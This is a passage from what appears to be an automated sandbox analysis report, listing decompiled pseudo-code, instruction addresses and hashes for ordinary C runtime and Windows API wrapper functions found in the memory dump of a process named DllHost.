				void* _t20;
				void* _t22;
				void* _t25;
				void* _t28;

				_t25 = __rax;
				asm("movaps [esp+0x60], xmm6");
				asm("movaps xmm6, xmm2");
				_t20 = r9d - 2;
				if (_t20 == 0) goto 0x191ec988;
				if (_t20 <= 0) goto 0x191ec9c7;
				if (r9d - 5 <= 0) goto 0x191ec96f;
				_t22 = r9d - 6;
				if (_t22 == 0) goto 0x191ec947;
				if (_t22 <= 0) goto 0x191ec9c7;
				if (r9d - 8 <= 0) goto 0x191ec91f;
				if (r9d != 9) goto 0x191ec9c7;
				_v56 = 2;
				_t2 = _t25 + 1; // 0x3
				r9d = _t2;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x11;
				goto 0x191ec9ab;
				_v56 = 2;
				r9d = 4;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x22;
				_v88 = 0x12;
				goto 0x191ec9ab;
				_v56 = 2;
				r9d = 1;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_v80 = 0x21;
				_v88 = 8;
				goto 0x191ec9ab;
				asm("movsd [esp+0x50], xmm6");
				asm("movaps xmm6, [esp+0x60]");
				goto 0x191f4ca4;
				_a64 = 2;
				r9d = 2;
				asm("movsd [esp+0x38], xmm1");
				asm("movsd [esp+0x30], xmm0");
				_a40 = 0x22;
				_a32 = 4;
				asm("movsd [esp+0x50], xmm6");
				_t17 = E00007FF77FF7191F4A48(_t18, 0x1d, r9d - 9, 0x19208114, _t28, _a80);
				asm("movaps xmm0, xmm6");
				asm("movaps xmm6, [esp+0x60]");
				return _t17;
			}













                                                                                                                                                              0x7ff7191ec8b0
                                                                                                                                                              0x7ff7191ec8b9
                                                                                                                                                              0x7ff7191ec8be
                                                                                                                                                              0x7ff7191ec8c1
                                                                                                                                                              0x7ff7191ec8c4
                                                                                                                                                              0x7ff7191ec8ca
                                                                                                                                                              0x7ff7191ec8d4
                                                                                                                                                              0x7ff7191ec8da
                                                                                                                                                              0x7ff7191ec8de
                                                                                                                                                              0x7ff7191ec8e0
                                                                                                                                                              0x7ff7191ec8ea
                                                                                                                                                              0x7ff7191ec8f0
                                                                                                                                                              0x7ff7191ec8f6
                                                                                                                                                              0x7ff7191ec8fa
                                                                                                                                                              0x7ff7191ec8fa
                                                                                                                                                              0x7ff7191ec8fe
                                                                                                                                                              0x7ff7191ec904
                                                                                                                                                              0x7ff7191ec90a
                                                                                                                                                              0x7ff7191ec912
                                                                                                                                                              0x7ff7191ec91a
                                                                                                                                                              0x7ff7191ec91f
                                                                                                                                                              0x7ff7191ec923
                                                                                                                                                              0x7ff7191ec929
                                                                                                                                                              0x7ff7191ec92f
                                                                                                                                                              0x7ff7191ec935
                                                                                                                                                              0x7ff7191ec93d
                                                                                                                                                              0x7ff7191ec945
                                                                                                                                                              0x7ff7191ec947
                                                                                                                                                              0x7ff7191ec94b
                                                                                                                                                              0x7ff7191ec951
                                                                                                                                                              0x7ff7191ec957
                                                                                                                                                              0x7ff7191ec95d
                                                                                                                                                              0x7ff7191ec965
                                                                                                                                                              0x7ff7191ec96d
                                                                                                                                                              0x7ff7191ec96f
                                                                                                                                                              0x7ff7191ec97a
                                                                                                                                                              0x7ff7191ec983
                                                                                                                                                              0x7ff7191ec988
                                                                                                                                                              0x7ff7191ec98c
                                                                                                                                                              0x7ff7191ec98f
                                                                                                                                                              0x7ff7191ec995
                                                                                                                                                              0x7ff7191ec99b
                                                                                                                                                              0x7ff7191ec9a3
                                                                                                                                                              0x7ff7191ec9ab
                                                                                                                                                              0x7ff7191ec9c2
                                                                                                                                                              0x7ff7191ec9c7
                                                                                                                                                              0x7ff7191ec9ca
                                                                                                                                                              0x7ff7191ec9d3

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _handle_error
                                                                                                                                                              • String ID: "$pow
                                                                                                                                                              • API String ID: 1757819995-713443511
                                                                                                                                                              • Opcode ID: b1ca8cfd3d724a5af3e010f86cad1af7ad89acb5d819fa7540bd4a813af05ec3
                                                                                                                                                              • Instruction ID: 3197c1c896862341960aeccd942fe3321533efe3438b557b9c71d5afb55707a5
                                                                                                                                                              • Opcode Fuzzy Hash: b1ca8cfd3d724a5af3e010f86cad1af7ad89acb5d819fa7540bd4a813af05ec3
                                                                                                                                                              • Instruction Fuzzy Hash: 57317072D1CE8487E761DF14F44076AEAB0FBDA358F201325F68916954DB7DD08A9B10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191EA3EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 42%
                                                                                                                                                              			E00007FF77FF7191EA3EC(char __ecx, void* __edx, void* __r8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long long _v48;
				char _v56;
				void* __rbx;
				void* _t31;
				char _t32;
				void* _t38;
				long long _t47;
				void* _t48;
				void* _t53;
				void* _t54;

				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_push(_t48);
				_t32 = __ecx;
				r8d = 0;
				if ( *0x19207f40 == __edx) goto 0x191ea427;
				r8d = r8d + 1;
				if (0x7ff719207f50 - 0x19208110 < 0) goto 0x191ea40c;
				goto 0x191ea432;
				_t47 =  *((intOrPtr*)(0x19207f40 + 8 + (r8d + r8d) * 8));
				_v48 = _t47;
				if (_t47 == 0) goto 0x191ea4a5;
				_v40 = _a24;
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_v20 = _a44;
				_v56 = __ecx;
				E00007FF77FF7191EA68C(__ecx, _t38, _t48, _a48, _t53, _t54);
				_t52 =  &_v56;
				if (E00007FF77FF7191E2A20(0xffc0,  &_v56) != 0) goto 0x191ea49d;
				E00007FF77FF7191EA3BC(_t32, _t47,  &_v56);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x191ea4ba;
				E00007FF77FF7191EA68C(_t32, _t38, _t48,  &_v56, _t53, _t54);
				_t31 = E00007FF77FF7191EA3BC(_t32, _t47, _t52);
				asm("movsd xmm0, [esp+0x80]");
				return _t31;
			}



















                                                                                                                                                              0x7ff7191ea3ec
                                                                                                                                                              0x7ff7191ea3f2
                                                                                                                                                              0x7ff7191ea3f8
                                                                                                                                                              0x7ff7191ea404
                                                                                                                                                              0x7ff7191ea409
                                                                                                                                                              0x7ff7191ea40e
                                                                                                                                                              0x7ff7191ea410
                                                                                                                                                              0x7ff7191ea421
                                                                                                                                                              0x7ff7191ea425
                                                                                                                                                              0x7ff7191ea42d
                                                                                                                                                              0x7ff7191ea43f
                                                                                                                                                              0x7ff7191ea447
                                                                                                                                                              0x7ff7191ea44d
                                                                                                                                                              0x7ff7191ea455
                                                                                                                                                              0x7ff7191ea45d
                                                                                                                                                              0x7ff7191ea465
                                                                                                                                                              0x7ff7191ea470
                                                                                                                                                              0x7ff7191ea47b
                                                                                                                                                              0x7ff7191ea47f
                                                                                                                                                              0x7ff7191ea483
                                                                                                                                                              0x7ff7191ea488
                                                                                                                                                              0x7ff7191ea494
                                                                                                                                                              0x7ff7191ea498
                                                                                                                                                              0x7ff7191ea49d
                                                                                                                                                              0x7ff7191ea4a3
                                                                                                                                                              0x7ff7191ea4a5
                                                                                                                                                              0x7ff7191ea4ac
                                                                                                                                                              0x7ff7191ea4b1
                                                                                                                                                              0x7ff7191ea4bf

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _set_errno_from_matherr
                                                                                                                                                              • String ID: exp
                                                                                                                                                              • API String ID: 1187470696-113136155
                                                                                                                                                              • Opcode ID: e6272d10d1b07220fc35f1c0b7f1db07441b92c98778db29b4350d112c8499d0
                                                                                                                                                              • Instruction ID: e58721c3df180c107d4e42113f42aff7b8deb8545dec8d1eea6131cdfc487176
                                                                                                                                                              • Opcode Fuzzy Hash: e6272d10d1b07220fc35f1c0b7f1db07441b92c98778db29b4350d112c8499d0
                                                                                                                                                              • Instruction Fuzzy Hash: 1E213073A18A418BE762EF28E44016AF7B0FB89714F940535F68D92B45DF3CD4469F10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7918 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF77FF7191E7918(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, long long _a40, intOrPtr _a48, long long _a56, long long _a64, long long _a72) {
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				long long _v56;
				void* _t26;
				void* _t38;
				void* _t53;

				_t40 = __rbx;
				_t38 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t26 = r9d;
				_t53 = __rcx;
				E00007FF77FF7191E76B4(1, __rbx, "CompareStringEx", __rsi, 0x19207d20, "CompareStringEx");
				if (_t38 == 0) goto 0x191e79ad;
				r9d = _t26;
				_v24 = _a72;
				_v32 = _a64;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _a40;
				 *0x191f94c0();
				goto 0x191e79df;
				E00007FF77FF7191E7EA8(0, 0, _t38, _t40, _t53);
				r9d = _t26;
				_v48 = _a48;
				_v56 = _a40;
				return CompareStringW(??, ??, ??, ??, ??, ??);
			}











                                                                                                                                                              0x7ff7191e7918
                                                                                                                                                              0x7ff7191e7918
                                                                                                                                                              0x7ff7191e7918
                                                                                                                                                              0x7ff7191e791d
                                                                                                                                                              0x7ff7191e7922
                                                                                                                                                              0x7ff7191e792c
                                                                                                                                                              0x7ff7191e793b
                                                                                                                                                              0x7ff7191e7951
                                                                                                                                                              0x7ff7191e7959
                                                                                                                                                              0x7ff7191e7963
                                                                                                                                                              0x7ff7191e7970
                                                                                                                                                              0x7ff7191e7978
                                                                                                                                                              0x7ff7191e7985
                                                                                                                                                              0x7ff7191e7991
                                                                                                                                                              0x7ff7191e799d
                                                                                                                                                              0x7ff7191e79a5
                                                                                                                                                              0x7ff7191e79ab
                                                                                                                                                              0x7ff7191e79b2
                                                                                                                                                              0x7ff7191e79b9
                                                                                                                                                              0x7ff7191e79c6
                                                                                                                                                              0x7ff7191e79d4
                                                                                                                                                              0x7ff7191e79f3

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareStringtry_get_function
                                                                                                                                                              • String ID: CompareStringEx
                                                                                                                                                              • API String ID: 3328479835-2590796910
                                                                                                                                                              • Opcode ID: 7c9bd78ff792a9350ac64235ae9f84f3d36b9cefda3b74ebcb642370a91b1f43
                                                                                                                                                              • Instruction ID: f1902185e9e6d49d9d545a0b6f87d4c33b08ceddd1f812c26d885e4cc2537a3b
                                                                                                                                                              • Opcode Fuzzy Hash: 7c9bd78ff792a9350ac64235ae9f84f3d36b9cefda3b74ebcb642370a91b1f43
                                                                                                                                                              • Instruction Fuzzy Hash: 16113E32608B8086E760EF05B4402AAB7B5FBD9BA4F544136EE8D53B19CF3CD5468B40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7DCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                              			E00007FF77FF7191E7DCC(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24, long long _a40, intOrPtr _a48, long long _a56, long long _a64, long long _a72) {
				long long _v24;
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				long long _v56;
				void* _t26;
				void* _t38;
				void* _t53;

				_t40 = __rbx;
				_t38 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t26 = r9d;
				_t53 = __rcx;
				E00007FF77FF7191E76B4(0x14, __rbx, "LCMapStringEx", __rsi, 0x19207e68, "LCMapStringEx");
				if (_t38 == 0) goto 0x191e7e61;
				r9d = _t26;
				_v24 = _a72;
				_v32 = _a64;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _a40;
				 *0x191f94c0();
				goto 0x191e7e93;
				E00007FF77FF7191E7EA8(0, 0, _t38, _t40, _t53);
				r9d = _t26;
				_v48 = _a48;
				_v56 = _a40;
				return LCMapStringW(??, ??, ??, ??, ??, ??);
			}











                                                                                                                                                              0x7ff7191e7dcc
                                                                                                                                                              0x7ff7191e7dcc
                                                                                                                                                              0x7ff7191e7dcc
                                                                                                                                                              0x7ff7191e7dd1
                                                                                                                                                              0x7ff7191e7dd6
                                                                                                                                                              0x7ff7191e7de0
                                                                                                                                                              0x7ff7191e7def
                                                                                                                                                              0x7ff7191e7e05
                                                                                                                                                              0x7ff7191e7e0d
                                                                                                                                                              0x7ff7191e7e17
                                                                                                                                                              0x7ff7191e7e24
                                                                                                                                                              0x7ff7191e7e2c
                                                                                                                                                              0x7ff7191e7e39
                                                                                                                                                              0x7ff7191e7e45
                                                                                                                                                              0x7ff7191e7e51
                                                                                                                                                              0x7ff7191e7e59
                                                                                                                                                              0x7ff7191e7e5f
                                                                                                                                                              0x7ff7191e7e66
                                                                                                                                                              0x7ff7191e7e6d
                                                                                                                                                              0x7ff7191e7e7a
                                                                                                                                                              0x7ff7191e7e88
                                                                                                                                                              0x7ff7191e7ea7

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Stringtry_get_function
                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                              • API String ID: 2588686239-3893581201
                                                                                                                                                              • Opcode ID: 83aca0db0f3a8315e0111171c4ce976db05bd8cac1dbedf6c627e18acb453d25
                                                                                                                                                              • Instruction ID: aee8e3dff9112e8aa40f2260ac2c3baca21afa2f7aaddc420532a1cb9f0a8c44
                                                                                                                                                              • Opcode Fuzzy Hash: 83aca0db0f3a8315e0111171c4ce976db05bd8cac1dbedf6c627e18acb453d25
                                                                                                                                                              • Instruction Fuzzy Hash: 66113B32608B8186E760DF15B4402AAB7B5FBC9B94F944136EE8D93B19CF3CD449CB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B1300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __std_exception_copy
                                                                                                                                                              • String ID: 123$string too long
                                                                                                                                                              • API String ID: 592178966-2834708651
                                                                                                                                                              • Opcode ID: 3e2a42b1462795403f13aea693ab6ac68be62e2d1374074a56ecf5cb42c1ce7e
                                                                                                                                                              • Instruction ID: 6f2a82110c3d2b67df06d3446c549260ee380d16f46403a4e66bf858a47c55b1
                                                                                                                                                              • Opcode Fuzzy Hash: 3e2a42b1462795403f13aea693ab6ac68be62e2d1374074a56ecf5cb42c1ce7e
                                                                                                                                                              • Instruction Fuzzy Hash: DCE03061A14E0991FA05AF21E8800E4A3719B28768BD89131DA5C46351EF2CE1DEC310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E43BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E00007FF77FF7191E43BC(void* __ecx) {
				signed int _v16;
				short _v18;
				intOrPtr _v22;
				short _v24;
				void* _t20;
				signed long long _t26;
				signed long long _t27;
				signed long long _t32;

				_t20 = __ecx;
				_t26 =  *0x192190a0; // 0x590452ce5669
				_t27 = _t26 ^ _t32;
				_v16 = _t27;
				if (__ecx - 0x1a <= 0) goto 0x191e43f5;
				E00007FF77FF7191DC834(_t27);
				 *_t27 = 0xf;
				E00007FF77FF7191DC854(_t27);
				 *_t27 = 0xd;
				E00007FF77FF7191DA5D8();
				goto 0x191e4429;
				if (_t20 != 0) goto 0x191e4400;
				goto 0x191e4429;
				_v22 = 0x5c003a;
				_v24 = _t20 + 0x40;
				_v18 = 0;
				return E00007FF77FF7191D23B0(0 | GetDriveTypeW(??) - 0x00000002 >= 0x00000000, _t20 + 0x40, _v16 ^ _t32);
			}











                                                                                                                                                              0x7ff7191e43bc
                                                                                                                                                              0x7ff7191e43c2
                                                                                                                                                              0x7ff7191e43c9
                                                                                                                                                              0x7ff7191e43cc
                                                                                                                                                              0x7ff7191e43d4
                                                                                                                                                              0x7ff7191e43d6
                                                                                                                                                              0x7ff7191e43db
                                                                                                                                                              0x7ff7191e43e1
                                                                                                                                                              0x7ff7191e43e6
                                                                                                                                                              0x7ff7191e43ec
                                                                                                                                                              0x7ff7191e43f3
                                                                                                                                                              0x7ff7191e43f9
                                                                                                                                                              0x7ff7191e43fe
                                                                                                                                                              0x7ff7191e4404
                                                                                                                                                              0x7ff7191e440c
                                                                                                                                                              0x7ff7191e4416
                                                                                                                                                              0x7ff7191e443b

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                              • String ID: :
                                                                                                                                                              • API String ID: 3215553584-336475711
                                                                                                                                                              • Opcode ID: 2f7ea2776d9b84b2b7b8de816162949e011c16823418a42a1cff4c878caf310a
                                                                                                                                                              • Instruction ID: a18bd298470119be60a5932ecae0f5e0050c1d0db2a0f76cf645d1801e5d5c02
                                                                                                                                                              • Opcode Fuzzy Hash: 2f7ea2776d9b84b2b7b8de816162949e011c16823418a42a1cff4c878caf310a
                                                                                                                                                              • Instruction Fuzzy Hash: 71016722A18A4287F722BF60B4551BEB3B0EF44B2CFC01435D55D46695DF2CE58EDA24
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7C3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                              			E00007FF77FF7191E7C3C(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long _a8) {
				int _t5;
				void* _t7;
				void* _t15;
				void* _t22;
				void* _t23;
				void* _t24;

				_t16 = __rbx;
				_t15 = __rax;
				_a8 = __rbx;
				_t7 = __edx;
				_t22 = __rcx;
				E00007FF77FF7191E76B4(0xf, __rbx, "GetUserDefaultLocaleName", _t23, 0x19207df8, "GetUserDefaultLocaleName");
				if (_t15 == 0) goto 0x191e7c7c;
				 *0x191f94c0();
				goto 0x191e7c92;
				_t5 = GetUserDefaultLCID();
				r9d = 0;
				r8d = _t7;
				return E00007FF77FF7191E7D5C(_t5, r9d, _t15, _t16, _t22, _t23, _t24);
			}









                                                                                                                                                              0x7ff7191e7c3c
                                                                                                                                                              0x7ff7191e7c3c
                                                                                                                                                              0x7ff7191e7c3c
                                                                                                                                                              0x7ff7191e7c46
                                                                                                                                                              0x7ff7191e7c4f
                                                                                                                                                              0x7ff7191e7c65
                                                                                                                                                              0x7ff7191e7c6d
                                                                                                                                                              0x7ff7191e7c74
                                                                                                                                                              0x7ff7191e7c7a
                                                                                                                                                              0x7ff7191e7c7c
                                                                                                                                                              0x7ff7191e7c82
                                                                                                                                                              0x7ff7191e7c85
                                                                                                                                                              0x7ff7191e7c9c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DefaultUsertry_get_function
                                                                                                                                                              • String ID: GetUserDefaultLocaleName
                                                                                                                                                              • API String ID: 3217810228-151340334
                                                                                                                                                              • Opcode ID: 73dbcb4227e50f5f72c2b68b34f4a744661828614cbee7425c1cea6b233ac06f
                                                                                                                                                              • Instruction ID: 5c55c512b1b54d5ddd8241f8a427bd95840c738701fa8d74047f1dcfc680870a
                                                                                                                                                              • Opcode Fuzzy Hash: 73dbcb4227e50f5f72c2b68b34f4a744661828614cbee7425c1cea6b233ac06f
                                                                                                                                                              • Instruction Fuzzy Hash: 42F0B410B08D4382FB557F55B9405B8A2766F487A8FC84035D91E03651CE2CD88E9760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E7CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 27%
                                                                                                                                                              			E00007FF77FF7191E7CA0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				void* _t15;

				_t15 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				E00007FF77FF7191E76B4(0x12, __rbx, "InitializeCriticalSectionEx", __rsi, 0x19207e20, "InitializeCriticalSectionEx");
				if (_t15 == 0) goto 0x191e7ceb;
				 *0x191f94c0();
				goto 0x191e7cf1;
				return InitializeCriticalSectionAndSpinCount(??, ??);
			}




                                                                                                                                                              0x7ff7191e7ca0
                                                                                                                                                              0x7ff7191e7ca0
                                                                                                                                                              0x7ff7191e7ca5
                                                                                                                                                              0x7ff7191e7cd1
                                                                                                                                                              0x7ff7191e7cde
                                                                                                                                                              0x7ff7191e7ce3
                                                                                                                                                              0x7ff7191e7ce9
                                                                                                                                                              0x7ff7191e7d00

                                                                                                                                                              APIs
                                                                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF7191E7CD1
                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7191DE104,?,?,?,?,?,?,?,?,00007FF7191D092A), ref: 00007FF7191E7CEB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                              • API String ID: 539475747-3084827643
                                                                                                                                                              • Opcode ID: c3f1643d391daf8bf60c262e7bd006332af8ba13a45654221d44b6c34e84e4e1
                                                                                                                                                              • Instruction ID: cf3935a9c035c6767141cfb280246e3f99971a466481d8339153934e68283a82
                                                                                                                                                              • Opcode Fuzzy Hash: c3f1643d391daf8bf60c262e7bd006332af8ba13a45654221d44b6c34e84e4e1
